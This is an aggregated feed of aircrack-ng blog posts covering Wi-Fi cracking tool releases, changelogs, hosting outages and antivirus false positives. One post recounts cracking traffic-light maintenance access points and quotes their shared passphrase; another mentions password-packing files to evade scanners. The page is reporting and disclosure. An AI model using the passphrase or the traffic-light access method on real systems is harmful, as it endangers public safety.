http://www.secuobs.com Observatoire de la securite Internet fr webmaster@secuobs.com 2009-04-26 20:18:27 - Aircrackng : I often see people who cracked a WEP key and who wanted to convert it toASCIIMy question is why do you want to convert itMaybe because it is easier to remember Mmmh not always,especially if it's 13 random characters like this: $5@r6m2be_rEXMaybe for network managers command line/graphical, Linux/WindowsNo, they don't care if it's ASCII or hex And an incomplete conversionwould be unusableAnd, btw, if it was convertible, aircrack-ng would have given you theASCII version :IMAGEhttp://www.secuobs.com/revue/news/88403.shtmlhttp://www.secuobs.com/revue/news/88403.shtml Secuobs.com : 2009-04-26 20:18:27 - Aircrackng - We are currently working on a new website, and more precisely on theentry of wwwaircrack-ngorgThis is not meant to replace the wiki but it is meant to give aquicker access to the most used things on the main page of the wikiand a better overview of the important thingsIt will be installed next to the wiki and thus nothing will change foryou you won't have to change your bookmarksWhat do you think about the new main pageIMAGEhttp://www.secuobs.com/revue/news/88402.shtmlhttp://www.secuobs.com/revue/news/88402.shtml Secuobs.com : 2009-04-26 20:18:27 - Aircrackng - There will be a new release in a day or 2 It will fix a lot of bugsincluding the compiling issue of rc2 on 64 bit and add one newfeature: creation of kismet newcore netxml files so that it can workwith GISkismet Some programs wesside-ng, easside-ng, tkiptun-ngwere marked as unstable and you need to append the flag'unstable=true' when running make and make installHere is the current changelog:* airodump-ng: Added Active Scanning Simulation* airodump-ng: Added support for kismet-newcore netxml files DTDv310* airodump-ng: Changed file extensions for CSV csv instead oftxt and for kismet CSV kismetcsv instead of csv* airodump-ng: Fixed WPA tag parsing and added QoS detection basedon direction* airodump-ng: Added option to only disable capture file; all otherfiles CSV, kismet CSV, kismet netxml, GPS will be created* aircrack-ng: Fixed -w with WEP* aircrack-ng: Fixed useless memory allocation* aircrack-ng: Fixed compilation with gcc 295* aircrack-ng: Fixed compilation on 64 bit SHA-SSE2* aircrack-ng: Fixed errors when compiling on OS X 1056 PPC* aircrack-ng: Added an option to write the key to a file* airolib-ng: Fixed a bug where database is created even ifparameters are not correct* airmon-ng: Added wifibox to the list of network manager* airmon-ng: Updated iw download link 099* airmon-ng and airdriver-ng: Move them in script/ directory* airmon-ng: Bypass interface checks when ps command returns anerror Needed for BusyBox limited ps command* airdriver-ng: Update legacy RT73 driver to use rt73-k2wrlz v302* tkiptun-ng: Allow padded arp packets to the client* airserv-ng et osdep: Fixed compilation on FreeBSD 71* easside-ng et wesside-ng: Fixing again "Error Wrote 39 out of 30"error message* manpages: Fixed manpages titles* Makefile: Only compile and install wesside-ng, easside-ng,buddy-ng and tkiptun-ng with "make unstable=true"* patches: Updated sqlite v3611 patch for cygwin* patches: Added patch for aircrack-ng on MacOSXIMAGEhttp://www.secuobs.com/revue/news/88401.shtmlhttp://www.secuobs.com/revue/news/88401.shtml Secuobs.com : 2009-04-26 20:18:27 - Aircrackng - As you saw, the forum has been down since a few hours, around 6pm GMT+1The reason is that the database size is really close to the alloweddisk space and the hoster stopped it automatically I moved it toanother place where we have much more space and there are just a fewthings to do before it's back up:- DNS needs to be updated- a few glitches on the server have to be fixed- A script has to be written to redirect all requests fromforumtinyshellbe to the new URL so that any link to it will stillworkThe good news is that nothing was lost and it should be faster thanbeforeAh yeah, It should be back up tomorrow evening and the release of10rc3 will be done the next day :IMAGEhttp://www.secuobs.com/revue/news/88400.shtmlhttp://www.secuobs.com/revue/news/88400.shtml Secuobs.com : 2009-04-26 20:18:27 - Aircrackng - The forum is finally up and everything is working fine:* DNS updated* Redirection works fine: all your bookmarks and links in theforum with the old address should redirect to the new oneautomatically I was surprised to see new posts announced on IRCthat still has the old RSS feed address Technically, the old URLrewrite the URL to point to the new location with the parametersand uses a 301 to do that* Links URLs, RSS are updated on the wiki* No more glitches on the server However if it happens, don'thesitate to send a mail to tdotreppe@aircrack-ngorg to tell mewith detailsLast but not least, the 10rc3 release should be done tomorrow ifeverything goes well I told Murphy to leave me alone at least for afew days :IMAGEhttp://www.secuobs.com/revue/news/88399.shtmlhttp://www.secuobs.com/revue/news/88399.shtml Secuobs.com : 2009-04-26 20:18:27 - Aircrackng - It is finally released :Download links:* Sources* Windows binaries - You have to read the important informationregarding windowsHere is a summary of the changes:* tkiptun-ng, easside-ng and buddy-ng and wesside-ng are notcompiled by default, you have to append 'unstable=true' whencompiling and installing* CSV file extension has changed and has now CSV as extension* Kismet CSV file extension is now kismetcsv* Airodump-ng can generate kismet newcore NetXML fileskismetnetxml and thus should be compatible with GISkismethowever using GPSd currently cause corruption pcap corruption;that will be fixed in the next release* Fixed compiling on 64 bit* There's a patch for OSX intel You must apply it or aircrack-ngwill not work correctly instructions can be found in INSTALLINGfile* Added Active scanning simulation in airodump-ng* Various fixesHere is the complete changelog:* airodump-ng: Added Active Scanning Simulation* airodump-ng: Added support for kismet-newcore netxml files DTDv310* airodump-ng: Changed file extensions for CSV csv instead oftxt and for kismet CSV kismetcsv instead of csv* airodump-ng: Fixed WPA tag parsing and added QoS detection basedon direction* airodump-ng: Added option to only disable capture file; all otherfiles CSV, kismet CSV, kismet netxml, GPS will be created* aircrack-ng: Fixed -w with WEP* aircrack-ng: Fixed useless memory allocation* aircrack-ng: Fixed compilation with gcc 295* aircrack-ng: Fixed compilation on 64 bit SHA-SSE2* aircrack-ng: Fixed errors when compiling on OS X 1056 PPC* aircrack-ng: Added an option to write the key to a file* airolib-ng: Fixed a bug where database is created even ifparameters are not correct* airmon-ng: Added wifibox to the list of network managers* airmon-ng: Updated iw download link 0911* airmon-ng and airdriver-ng: Move them in script/ directory* airmon-ng: Bypass interface checks when ps command returns anerror Needed for BusyBox limited ps command* airdriver-ng: Update legacy RT73 driver to use rt73-k2wrlz v302* tkiptun-ng: Allow padded arp packets to the client* airserv-ng et osdep: Fixed compilation on FreeBSD 71* easside-ng et wesside-ng: Fixing again "Error Wrote 39 out of 30"error message* manpages: Fixed manpages titles* Makefile: Only compile and install wesside-ng, easside-ng,buddy-ng and tkiptun-ng with "make unstable=true"* patches: Updated sqlite v3611 patch for cygwin* patches: Added patch for aircrack-ng on MacOSX* scripts: Added a script to automatically patch and install SQLitein cygwinIMAGEhttp://www.secuobs.com/revue/news/88398.shtmlhttp://www.secuobs.com/revue/news/88398.shtml Secuobs.com : 2009-04-26 20:18:27 - Aircrackng - EDIT: This was an April Fool :Altought this is not a final version a work in progress, here is aversion of airodump-ng that works on windows with the native driversof your wireless cardHere is a screenshot of the application:Download link: airodump-ng-win-native-driverszipNearly all drivers in windows XP are NDIS So, to allow/enable monitormode in the drivers, you have to install a special "driver" BecauseMS may not like it, I prefer to distribute is via bittorrent:native_rfmon_winxptorrentNote: It was tested on Windows XP and with an Intel Pro/Set Wireless2200 And it requires NET 20Note 2: If your wireless card isn't listed, it means the adapter isdisabled and you'll have to enable it and restart the applicationRight click on "My Network Place" then select "Properties" In thelist, right click on your wireless adapter and click on "Enable" Inthe final version, it will be fixed and will only list wirelessinterfacesEdit: Here is the video sorry for the quality, it's not easy torecord the screen with a cameraIMAGEhttp://www.secuobs.com/revue/news/88397.shtmlhttp://www.secuobs.com/revue/news/88397.shtml Secuobs.com : 2009-04-26 20:18:27 - Aircrackng - I'll be giving a workshop at Brucon 2009 18-19 September 2009Abstract:During this workshop, I'll tackle different scenarios that couldhappen during an audit of WiFi networks Open, WEP and WPA, includingthe use of CUDA and FPGA to accelerate crackingAircrack-ng is not only meant for auditing wireless networks, it canalso be used for site surveys and different tools based on it will bepresented:- Airgraph-ng, graphing wireless networks and its integration inMaltego- GISKismet, representing wireless networks in Google earth- And moreThere will also be a contest More details will followIMAGEhttp://www.secuobs.com/revue/news/88396.shtmlhttp://www.secuobs.com/revue/news/88396.shtml Secuobs.com : 2009-04-26 20:18:27 - Aircrackng - Unfortunatly, the website is down due to an error in traffic calculationWe usually use 30-40Gbytes per day and we have 1200Gbytes of trafficper month, so enough for each monthBut the 14 and 15 April, their system say we use 688 and 884Gb = morethan 10Mbytes/sec for 24 hours of traffic so 20-30 times what weusually use thus exceeding the allowed traffic per monthI'm contacting them to try to fix it as soon as possibleEdit:Here is an update:http://aircrack-ngblogspotcom/2009/04/paying-billhtmlIMAGEhttp://www.secuobs.com/revue/news/88395.shtmlhttp://www.secuobs.com/revue/news/88395.shtml Secuobs.com : 2009-04-26 20:18:27 - Aircrackng - I finally found who is the responsible or at least the IP address of theauthor of this DoS if generating 15Tb of traffic in 2 days andmaking the monthly traffic exceed thus making the website down is nota DoS, then what is it and you can be sure that this guy will haveto pay the traffic, sooner or laterAdministrative stuff is taking too long so I think it will be easierto pay the bill now to have the website back upAircrack-ng cost me around 60 euro per month + domain names that haveto be renewed each year, wireless cards, traffic, and although wehave around 30K unique visitors each day, unfortunatly donations arequite low the total for last year was around 80 euro The reason whyI'm writing this post is to ask for donations to pay that bill around130 euroSo, any donation to tdotreppe@aircrack-ngorg paypal is reallywelcomeIMAGEhttp://www.secuobs.com/revue/news/88394.shtmlhttp://www.secuobs.com/revue/news/88394.shtml Secuobs.com : 2009-04-26 20:18:27 - Aircrackng - Good news, the website is now up thanks to all donationsEven if I really like to work on aircrack-ng, it is really great tosee a lot of people helping us, and I really want thank them a lot ;The other good news is that we now have enough to pay hosting untilJuly if this kind of DoS doesn't happen again but please continue,that would be wonderful if donations could cover hosting costs everymonthLast but not least, I promise that I'll try to make that guy pay thetraffic he generatedIMAGEhttp://www.secuobs.com/revue/news/88393.shtmlhttp://www.secuobs.com/revue/news/88393.shtml Secuobs.com : 2009-04-26 20:18:27 - Aircrackng - As I said, I know the IP address of the author of the DoS on our websiteand since he's located in Europe Spain, it shouldn't be really hardto solve the case with the Computer Crime UnitHowever, I would like to try to solve it with him first I just wanthim to contact me tdotreppe@aircrack-ngorg within 2 weeks toreimburse the bandwidth he generated and explain why he did it and Ipromise there will be no consequence, no complaint registeredIMAGEhttp://www.secuobs.com/revue/news/88392.shtmlhttp://www.secuobs.com/revue/news/88392.shtml http://www.secuobs.com Observatoire de la securite Internet fr webmaster@secuobs.com 2016-02-16 04:42:50 - Aircrack ng : I tried to compile Aircrack-ng on a 'few' systems to see how it works and I was quite surprised by the amount of systems it can be compiled on and most of the time, it can be compiled with both gcc and clang Here is the status for the current development code r2846 I will update this matrix and add more details from time to time On x86 32 64 bit GCC Clang LLVM Linux Yes Yes OpenWrt Yes Untested Cygwin 32 bit Yes Yes Cygwin 64 bit Yes No OSX Travis CI Yes Yes FreeBSD No Yes OpenBSD Yes Yes NetBSD Untested Untested DragonFlyBSD Yes No package Solaris Yes Yes Other CPUs Linux GCC Clang LLVM ARM 32 bit Yes Yes ARM 64 bit Yes Untested MIPS Yes No http://www.secuobs.com/revue/news/598384.shtmlhttp://www.secuobs.com/revue/news/598384.shtml Secuobs.com : 2016-02-15 03:39:17 - Aircrack ng - Fourth release candidate There will be another one, some small bugs still need to be fixed but it should happen fairly soon On top of a big speed increase up to 175pourcents increase that also fixes compilation on Cygwin 64 bit, it includes a ton of fixes and improvements on Linux, BSD, Solaris and Cygwin on x86 and Linux on ARM and MIPS Changelog Airodump-ng Increase console window size Aircrack-ng Added time remaining and percentage done when doing WPA cracking with a dictionary file Aircrack-ng Make benchmark last 15 seconds for a more accurate value Aircrack-ng Fixed compilation on Cygwin 64 and drastically improve cracking speed for all CPUs up to 175pourcents performance Airmon-ng Improved chipset detection on FreeBSD Airmon-ng Display chipset for some Broadcom SDIO Airbase-ng Fixed broadcasting 'default' General Updated and cleanup TravisCI file to test compilation and testing on OSX General Fixed reading large files on Cygwin General Fixed a bunch of compilation warnings with gcc and clang General Fixed compilation on Solaris, OpenBSD, DragonFlyBSD 44, NetBSD, OSX General Fixed compilation on ARM and MIPS General Improved compatibility on FreeBSD and Cygwin RAM and CPU detection General Fixed gcc segfault on cygwin General Memory cleanups, fixed memory leaks and fix other issues reported by Valgrind Testing Fixes on various OSes INSTALLING Updated installation instructions for different OS TravisCI Improved file http://www.secuobs.com/revue/news/598275.shtmlhttp://www.secuobs.com/revue/news/598275.shtml Secuobs.com : 2015-12-30 10:10:59 - Aircrack ng - Almost 8 years, we got pretty big improvement with SSE2 code to crack WPA, a nice upgrade from MMX I recently posted a bug bounty to fix the compilation of Aircrack-ng on Cygwin 64 bit It's been working fine on Linux 64 bit but for some reason, Cygwin didn't like when compiling on 64 bit We couldn't have tested it back then since Cygwin 64 bit didn't exist at the time darkfires took up the challenge to fix the compilation on Cygwin 64 bit After that, he helped fix a bunch of memory leaks and other issues as well as improving cracking speed quite a bit, which is the reason of this post The task was pretty daunting and a lot of testing was needed to make sure it works on the different CPU architectures x86 32 and 64 bit, various ARM and different OSes Cygwin, Linux, BSD, Solaris, OSX On top of the usual 'fixing something on one, breaking on the other', here are three examples on how complicated it was Different CPU support different features and instructions set and detecting them wasn't an easy task For example, on Raspberry Pi v1 , gcc supports 'neon' and we can compile aircrack-ng with them but the CPU itself doesn't support them which means aircrack-ng crashes and it has to be disabled On the Beaglebone, the CPU support neon instructions gcc can compile with AVX2 instructions on x86 However, if the CPU doesn't support it, aircrack-ng will crash with a nice error 'Illegal instruction' Some code that works to get CPU features such as MMX, SSE, AVX works on some CPU and doesn't on others There is no way to explain in details how complicated it was to make it work on all those different combinations of CPU and OSes darkfires has spent countless hours making all of this work To give you an idea how much work has been done, the patch was 375Kb and 11K lines long On top of it, the Aircrack-ng CPU detection code has been rewritten on x86 to give more details Here is what 'aircrack-ng -u' now looks like Vendor Intel Model Intel R Core TM i7-2630QM CPU 200GHz Features MMX,SSE,SSE2,SSE3,SSSE3,SSE41,SSE42,AVX Hyper-Threading Yes Logical CPUs 8 CPU cores 4 SIMD size 4 128 bit Last but not least, here are the numbers 12rc3 r2800 Increase Celeron M 14Ghz 138k s 152k s 10pourcents i7-2630QM 3000k s 4000k s 33pourcents E3-1231 v3 4900k s 13100k s 167pourcents i5-4590 4700k s 11600k s 146pourcents i7-6700K 6200k s 17100k s 175pourcents It's still pretty far from GPU cracking speeds but there are pretty significant gains thanks to AVX The second version provides the most gains as you can see on the numbers above Bonus thing if you are a package maintainer, you can compile aircrack-ng with different improvements Simply edit the commoncfg and put MULTIBIN true and when running make will compile 3 different versions the original, SSE and SIMD We have tested it quite a bit on different CPU and OSes but please test simply get the latest revision from our subversion repository a lot and report back to us Let us know how it works for you, what kind of improvements you're getting and we especially want to hear if you have bugs If you have a recent AMD CPU, we want to hear from you The plan is to make another release candidate in about 2 weeks http://www.secuobs.com/revue/news/594463.shtmlhttp://www.secuobs.com/revue/news/594463.shtml Secuobs.com : 2015-11-22 00:12:20 - Aircrack ng - Third release candidate and hopefully this should be the last one It contains a ton of bug fixes, code cleanup, improvements and compilation fixes everywhere Some features were added AppArmor profiles, better FreeBSD support, including an airmon-ng for FreeBSD Changelog Airodump-ng Prevent sending signal to init which caused the system to reboot shutdown Airbase-ng Allow to use a user-specified ANonce instead of a randomized one when doing the 4-way handshake Aircrack-ng Fixed compilation warnings Aircrack-ng Removed redundant NULL check and fixed typo in another one Aircrack-ng Workaround for segfault when compiling aircrack-ng with clang and gcrypt and running a check Airmon-ng Created version for FreeBSD Airmon-ng Prevent passing invalid values as channel Airmon-ng Handle udev renaming interfaces Airmon-ng Better handling of rfkill Airmon-ng Updated OUI URL Airmon-ng Fix VM detection Airmon-ng Make lsusb optional if there doesn't seem to be a usb bus Improve pci detection slightly Airmon-ng Various cleanup and fixes including wording and typos Airmon-ng Display iw errors Airmon-ng Improved handling of non-monitor interfaces Airmon-ng Fixed error when running 'check kill' Airdrop-ng Display error instead of stack trace Airmon-ng Fixed bashism Airdecap-ng Allow specifying output file names Airtun-ng Added missing parameter to help screen Besside-ng-crawler Removed reference to darkircoporg non-existent subdomain Airgraph-ng Display error when no graph type is specified Airgraph-ng Fixed make install Manpages Fixed, updated and improved airodump-ng, airmon-ng, aircrack-ng, airbase-ng and aireplay-ng manpages Aircrack-ng GUI Fixes issues with wordlists selection OSdep Add missing RADIOTAP_SUPPORT_OVERRIDES check OSdep Fix possible infinite loop OSdep Use a default MTU of 1500 Linux only OSdep Fixed compilation on OSX AppArmor Improved and added profiles General Fixed warnings reported by clang General Updated TravisCI configuration file General Fixed typos in various tools General Fixed clang warning about 'gcry_thread_cbs ' being deprecated with gcrypt 160 General Fixed compilation on cygwin due to undefined reference to GUID_DEVCLASS_NET General Fixed compilation with musl libc General Improved testing and added test cases make check General Improved mutexes handling in various tools General Fixed memory leaks, use afer free, null termination and return values in various tools and OSdep General Fixed compilation on FreeBSD General Various fixes and improvements to README wording, compilation, etc General Updated copyrights in help screen http://www.secuobs.com/revue/news/590779.shtmlhttp://www.secuobs.com/revue/news/590779.shtml Secuobs.com : 2015-04-10 15:46:50 - Aircrack ng - Here is the second release candidate Along with a LOT of fixes, it improves the support for the Airodump-ng scan visualizer Airmon-zc is mature and is now renamed to Airmon-ng Also, Airtun-ng is now able to encrypt and decrypt WPA on top of WEP Another big change is recent version of GPSd now work very well with Airodump-ng Changelog Airtun-ng Adds WPA CCMP and TKIP decryption and CCMP encryption Compilation Added support for DUMA Makefile Renamed 'unstable' to 'experimental' Airodump-ng Fixed XML sanitizing Airmon-ng Airmon-zc is now stable enough to replace airmon-ng Manpages Removed airdriver-ng manpage and references to it forgot to do it before the previous release Manpages Updated 'see also' references in all manpages PCRE Added it in various places and docs WZCook Fixed processing values stored in register Updated a few headers files if_llc, ieee80211, ethernet and if_arp Travis CI updated make parameter and add testing with pcre Compilation de-hardcode -lpcap to allow specifying pcap libraries Makefile Fixed installing uninstalling Airdrop-ng documentation files Makefile Fixed uninstalling ext_scripts Airodump-ng Added new paths and removed one for OUI files and simplified logic to find the OUI file Aircrack-ng Fixed ignoring -p when specified after -S Airmon-ng fixes for openwrt busybox ps grep issues which do not seem present in other versions of busybox Airmon-ng fix vm detection Airserv-ng Fixed channel setting and assert call Airodump-ng Fixes to NetXML unassociated clients missing and various other small bugs and update the code to match current NetXML output Airodump-ng Removed requirement for 2 packets before AP is written to output text files Airodump-ng Fixed formatting of ESSID and display of WPA WPA2 as well as a bunch of other small fixes in CSV file Airodump-ng Fixed GPSd Airodump-ng Allow to specify write interval for CSV, kismet CSV and NetXML files Airserv-ng Fixed wrong station data displayed in Airodump-ng General Fixed 64 bit promotion issues General Fixed a bunch of uninitialized values and non-zeroed structures upon allocating them General Added Stack protection Various other small fixes and improvements http://www.secuobs.com/revue/news/566863.shtmlhttp://www.secuobs.com/revue/news/566863.shtml Secuobs.com : 2014-11-01 01:14:27 - Aircrack ng - Here is the first release candidate I was wrong about saying there would be a fourth beta in the post of the previous release There is exactly 7 month after the last beta There will be most likely another one then the final release in the next few month Updating is highly recommend as this contains a lot of bug fixes and improvements as well as security fixes More details can be found in the blog Changelog Airodump-ng should be able to parse the canonical oui file Airodump-ng Fixed GPS stack overflow Airodump-ng Fixed stopping cleanly with Ctrl-C Airmon-zc better handling for when modules are not available incomplete Airmon-zc users can now start the monitor interface again to change channels Airmon-zc update to use ip instead of ifconfig if available Airmon-zc better handling of devices without pci bus Aireplay-ng Fixed tcp_test stack overflow OSdep Fixed libnl detection Also avoid detection on non Linux systems OSdep Fixed segmentation fault that happens with a malicious server Besside-ng Add regular expression matching for the SSID Buddy-ng Fixed segmentation fault Makefile Fixed 'commands commence before first target' error when building Aircrack-ng Fixed segfault when changing the optimization when compiling with gcc thanks to Ramiro Polla Removed airdriver-ng outdated and not meant for today's kernels Added gitignore file Fixed build issues on other compilers by using stdinth types Updating installation file and added pkg-config as a requirement Various small fixes and improvements http://www.secuobs.com/revue/news/543416.shtmlhttp://www.secuobs.com/revue/news/543416.shtml Secuobs.com : 2014-06-11 05:04:48 - Aircrack ng - Recently, on twitter, I talked about Comcast and their xfinitywifi network Here is the full story If you have Comcast and a recent modem from them such as one of those, it creates by default a wireless network called xfinitywifi if it doesn't now, it will do it soon So that other people with Comcast can login to it and have Internet access when they are traveling It's a pretty good idea since it does not use any of your bandwidth based on what they say and Slashdot had a story today from the Houston Chronicle but it could slow down your wireless network since it is on the same channel However, I really don't like the way they implemented it it is enabled by default and you can only disable when logging on your account online, there is not a single mention of it in the modem configuration It's also a bad idea because you can easily fake it to steal credentials it's an Open network, no encryption Unfortunately, I had to spend quite a lot of time with their tech customer service to figure out and get it disabled their first attempt to disable it failed And they will try to convince you to leave it I knew they have access to the cable modem and they can reset upgrade the firmware What's really worrying is that they can access all the settings of the modem, including the wireless settings and they could tell me what my WiFi settings were They might also be able to access your network Moving on Another issue I mentioned to their tech was that there was another wireless network along xfinitywifi and my personal network A hidden network with the same security settings as my personal network or it's just a coincidence I use the same settings as them The MAC address is also very similar to the one of your modem What changes is the first byte As of now last time I spoke to them was 2 or 3 week ago at least , this hidden network is still there and I have absolutely no idea what that network is So, I'll disable the wireless on the modem and have another AP between the modem and my network Here is a picture of the network let me know if you'd like a PCAP Does anybody knows what that hidden wireless network is for Comcast hasn't responded yet to that question on twitter http://www.secuobs.com/revue/news/518144.shtmlhttp://www.secuobs.com/revue/news/518144.shtml Secuobs.com : 2014-06-09 00:13:07 - Aircrack ng - Recently, I had a small discussion about moving to GitHub or another similar solution on IRC The subject has come up several times and I thought several times about it and I'd like to have a more opinions about it I'm really tempted to move it since it might decrease cost a little bit and most importantly, it will decrease the amount of maintenance I have to do However, I have some concerns and I'm open to new ideas I like GitHub since it has most of the features of a base trac and I don't need more than that User management is built-in, as well as anti-spam There is a big community around it and we can do continuous integration using Travis CI And I don't have to spend time cleaning up the spam, updating the server and making sure it's secure I guess GitHub have security measures Here is what I don't like with GitHub 1 You don't have control of your code anymore 2 One way thing you can import trac tickets and stuff to GitHub but I never heard of tools to back that up 3 You depend on them if they're down, you'll have to wait for their stuff to come back up If they get hacked, you might be in trouble They can close your project If you guys remember WhatsApp, a few days before it was bought by Facebook, GitHub received DCMA letters and had to close a bunch of projects that were related to WhatsApp or API library 4 You need an account to create a bug report However, the cons can be somehow alleviated 1 Hosting my own git repository and syncing to GitHub as well as other GitHub alternatives 2 If there is no tool to back up GitHub, I might develop one and open source it or pay somebody to create one 3 Using multiple services We could have GitHub as main the main location and using other services as back-up read-only If GitHub gets down, we can switch any other to read-write However, we'll need a software to do the sync and it also depends on the back-up program in the previous point 4 If they don't have an account Accept bug reports by email and or have people post in the forum you don't need an account to post and I take care of adding them to GitHub So, here are my questions 1 What is your opinion about using GitHub and git for Aircrack-ng instead of trac svn 2 What are the alternative to GitHub free, hosted If you've used it, please give me your opinion about it I'm also willing to pay a few dollars a month if there is a serious one 3 What are the installable to your own server alternatives to GitHub It's better if it's free open source but I don't mind paying if the solution is good Here is what I found and heard about GitLab to install, as backup, using gitlab-mirrors , BitBucket, Gitorious, Kiln However, I need more feedback about them As I get feedback, I'll update the post http://www.secuobs.com/revue/news/517729.shtmlhttp://www.secuobs.com/revue/news/517729.shtml Secuobs.com : 2014-06-09 00:13:07 - Aircrack ng - Anti-viruses have a bright side and a dark side Well, Antivirus are like baby sitters, they prevent dangerous thing happening to your computer In a certain light, it's a good thing but when you grow up in this case, know how to use computers safely and want to use security tools , that baby sitter becomes more an annoyance What I mean is that most security tools are flagged by anti viruses and Aircrack-ng isn't an exception Sometimes, they just flag it as 'hacktool' or 'not-a-virus' but a few of them have weird looking names and googling them doesn't even give you an answer of what it means I had to deal with a lot of stuff because of that Emails from people telling me their antivirus detected aircrack-ng as a virus and I had to tell them it's perfectly safe and their antivirus is wrong Yahoo who has or had a safe page system using MacAfee It was telling Aircrack-ng website wasn't safe despite all messages saying it's perfectly safe VIPR anti-virus who was removing links to Aircrack-ngorg because they thought it wasn't safe And a few other things I don't even remember Here is one I just found in the forum It hasn't been a problem until now because my hosting provider uses a service from C-Sirtorg to do online scanning of files to make sure there's no virus In most cases, they are right but there is always an exception The problem is that they think their system is perfect as you can see when they talk about false positive IMAGE At first, I was surprised and took their incident seriously I started checking the MD5 and SHA1 of the file which haven't changed , submitted files to virustotalcom That's where I saw why they think Aircrack-ng is a virus As you can see, some of them give a name that will make you freak out and using google to find out what that means gives you NOTHING but most of them don't detect or clearly see it as Aircrack-ng I emailed the guy behind C-Sirtorg Unfortunately, his english is more than approximate and if I understand correctly what he tells me, I should simply contact all anti-viruses and ask them to remove Aircrack-ng from their definitions so that his algorithm won't flag it as a virus anymoreWell, I would be more than happy to do so but my experience with first line customer service is not successful so I doubt it will work out Back to my provider Even though I've been a customer for more than 6 years, they blindly trust C-Sirtorg and wrongfully shut down one of my server where they thought the file was and I'm still having issues getting it back up and threatened to shut down my hosting where I told them where the file is because of a mistake in C-Sirt due to antiviruses definitions I tried to convince them without any success and I'll gladly show you the emails if you guys want as well as the single email I got from C-Sirtorg So, Anti-virus vendors, please be smarter nannys I'm ok with you flagging viruses but flagging security tools, that doesn't make sense and hurt us Please remove Aircrack-ng and other security tools from your definitionsIn the meantime, I'll just repack the file and add a password so you won't be able to scan it and it won't be wrongfully flaggedAnd if you're not planning to take it off your definition, I've got a request to add another well know security tool who's using Aircrack-ng Core Impact They even submit a new attack for Aircrack-ng which gives you a good reason and a proof that it's not a virus to take it off your definitions http://www.secuobs.com/revue/news/517728.shtmlhttp://www.secuobs.com/revue/news/517728.shtml Secuobs.com : 2014-04-01 07:28:57 - Aircrack ng - And a third beta I can guarantee there will be at least a fourth one before the final 12 release Changelog Finally properly fixed the buffer overflow Fixed channel parsing eg 108, 125 and updated radiotap parser Various other small fixes http://www.secuobs.com/revue/news/505809.shtmlhttp://www.secuobs.com/revue/news/505809.shtml Secuobs.com : 2013-12-01 06:49:26 - Aircrack ng - Here is a second beta Enjoy it Release Notes Airbase-ng IE order fixed Improved WEP cracking speed using PTW Fixed WPA capture decryption when WMM is used Fixed memory leaks in several parts of the suite Fixed compilation with recent version of gcc, on cygwin and on Gentoo hardened Now using Coverity Scan for static code analysis Lots of other small fixes Detailed changelog Airbase-ng Fixed order of IE when creating soft Access Point Airbase-ng Fixed Caffe Latte Attack not working for all clients Aircrack-ng Improved PTW speed thanks to Ramiro Polla Airmon-zc Fixed improper use of the interface Airdecap-ng Fixed decoding captures with WMM enabled Various Fixed memory leaks in Aircrack-ng, Aireplay-ng, OSdep Added support for static analysis using Coverity Scan Fixed compilation due to PIC unfriendly assembly on Gentoo hardened Fixed running tests using 'make check' Fixed building aircrack-ng with recent version of gcc and also on cygwin Various other small fixes http://www.secuobs.com/revue/news/483703.shtmlhttp://www.secuobs.com/revue/news/483703.shtml Secuobs.com : 2013-05-26 06:35:21 - Aircrack ng - After a few years, we finally got a release 12 Beta 1 Enjoy - Release summary Compilation fixes on all supported OSes Makefile improvement and fixes A lot of fixes and improvements on all tools and documentation Fixed licensing issues Added a few new tools and scripts including distributed cracking tool Fixed endianness and QoS issues You can find more details in the ChangeLog and even more in our subversion history And, 2 more things The forum will be ready in a few days We are now using Travis CI for continuous integration http://www.secuobs.com/revue/news/447772.shtmlhttp://www.secuobs.com/revue/news/447772.shtml Secuobs.com : 2013-05-21 06:42:57 - Aircrack ng - Trac SVN You probably didn't notice but I had been working a lot on the servers and I recently migrated our old trac server to a new server However, a migration never goes without a glitch who unleashed Murphy A few settings changes needs to be done for Trac and we're done but SVN was behaving The only solution I saw is moving it temporarily to a separate server URL http svnaircrack-ngorg You can also reach it via https but it's a self signed certificate for now Since the repository UUID didn't change, you can simply relocate your local copy or check out with the new svn URL Trac URL didn't change and it is now also available via HTTPS with a proper certificate Forum It had a big issue a few weeks ago My provider told me their log says the instance was stopped However, their cloud system crashed the instance The non-persistant disk where the OS of the instance is installed goes back to its original state so any data customization on that disk is lost when the VM is stopped or archived I already had similar issues before but I was able to force the instance to reboot so it wasn't a big deal Forum data is hosted on a MySQL database and those files were on the non-persistant disk Good news Forum files and Apache config were stored on the persistant disk and I had a backup script for the DB Bad news last time the backup script ran was in July 2012 Lesson learned check every often that the backup scripts are still running We lost about 10 month of posts and I am deeply sorry for what happened I had a discussion with my provider and I'm now downsizing due to that issue, past issues and their customer support I'll only keep stuff that never gave me any issue domains Trac was the first service to be migrated to the new server a very good friend gave me I can't thank him enough for that Other services will be moved on that server too http://www.secuobs.com/revue/news/446684.shtmlhttp://www.secuobs.com/revue/news/446684.shtml Secuobs.com : 2013-04-02 03:42:07 - Aircrack ng - Hello guys, Some time ago, a person who shall not be named emailed me and talked about new traffic lights that can be controlled wirelessly Since access points are getting pretty powerful these days, it makes sense that they are now embedded in traffic lights to control them The reason behind making it wirelessly accessible is to make maintenance easier for technicians so that they don't have to open the whole thing They just have to connect to the AP inside the traffic light to do it Here is the maintenance page The URL of that page is blurred for security reasons IMAGE Since there is no reference to it on other pages and it's so basic, I guess they forgot to remove it on production units or maybe it is just meant to be used by technicians developers or it is security by obscurity On other pages you can input parameters of the traffic lights when it is in automatic mode such as operating times it will blink yellow when outside of it , how long does each light last, etc He even sent me one of those traffic light As a side note, you would be amazed by the size of those things IMAGE Here is a close-up where the AP is IMAGE The network cable you can see is used to interconnect different traffic lights at crossroads to synchronize several of them Well, of course, since they don't want people to just hack in and mess with the traffic lights, they did not make it easy to connect SSID is random and to find that page However, the person who contacted me managed to grab the handshake while the maintenance guy was doing maintenance and apparently, they use the same easy passphrase Maintenance123 on ALL those new traffic lights By decrypting the traffic, he figured out the page where you can control the traffic light manually We both tried to contact the company to let them know about the flaws since it's pretty unsafe dangerous to be able to change the light on live traffic lights and especially since they use the same passphrase on all of them But they never got back to us http://www.secuobs.com/revue/news/437045.shtmlhttp://www.secuobs.com/revue/news/437045.shtml Secuobs.com : 2012-10-19 02:52:51 - Aircrack ng - Even though there is plenty of documentation on the subject and most of the time, existing posts about it in the forum , I still see a lot of these questions, especially for new cards It's pretty easy to find out and the easiest way is just to try it with a recent version of a pentesting live CD like Backtrack or Pentoo If your card is detected, you're good to go You can even use Ubuntu or whetever distro you're comfortable with An important thing to note is that what airmon-ng says about your chipset is pure information and doesn't affect your card ability to inject 